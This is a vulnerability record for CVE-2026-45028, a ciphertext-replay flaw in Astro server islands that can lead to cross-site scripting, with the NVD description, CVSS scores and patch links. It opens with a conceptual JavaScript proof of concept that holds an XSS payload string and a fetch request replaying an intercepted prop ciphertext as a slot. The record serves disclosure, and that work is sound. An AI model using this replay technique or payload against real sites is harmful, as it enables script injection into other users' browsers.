CVE-2026-45028

// Conceptual Proof of Concept for CVE-2026-45028 // Attacker scenario: Replaying an encrypted 'prop' as a 'slot' to trigger XSS. // 1. Assume the attacker controls the 'data' prop in 'ComponentA'. // They inject a malicious payload: var maliciousPayload = "<img src=x onerror=alert('XSS')>"; // 2. The server encrypts this payload for 'ComponentA' props (p). // Attacker intercepts the response (e.g., via Burp Suite or browser DevTools). // Example captured encrypted value (Base64): var interceptedEncryptedValue = "AQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyA..."; // 3. Attacker sends a request to 'ComponentB', which has a slot (s) // with the same key name 'data'. // The attacker replays the intercepted value as the slot input. fetch('/api/component-b-render', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ // Replaying the prop ciphertext as a slot ciphertext s: interceptedEncryptedValue }) }).then(response => response.text()) .then(html => { // 4. If vulnerable, the server renders the HTML containing the unescaped script. console.log("Vulnerable if alert appears in rendered HTML:", html); });

{"cve": {"id": "CVE-2026-45028", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:17:00.173", "lastModified": "2026-05-14T13:28:32.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Astro is a web framework. Astro versions prior to 6.1.10 used AES-GCM encryption to protect the confidentiality and integrity of server island props and slots parameters, but did not bind the ciphertext to its intended component or parameter type. An attacker could replay one component's encrypted props (p) value as another component's slots (s) value, or vice versa. Since slots contain raw unescaped HTML while props may contain user-controlled values, this could lead to XSS in applications. This occurs when the application uses server islands, two different server island components share the same key name for a prop and a slot, and an attacker has full control over the value of the overlapping prop (requires a dynamically rendered page). This vulnerability is fixed in 6.1.10."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-323"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "6.1.10", "matchCriteriaId": "994D2919-6007-4B4C-8457-7A1FB3EBC536"}]}]}], "references": [{"url": "https://github.com/withastro/astro/commit/3d82220a1549e699e34ed433f3846a919f4c02bd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/withastro/astro/pull/16457", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/withastro/astro/security/advisories/GHSA-xr5h-phrj-8vxv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}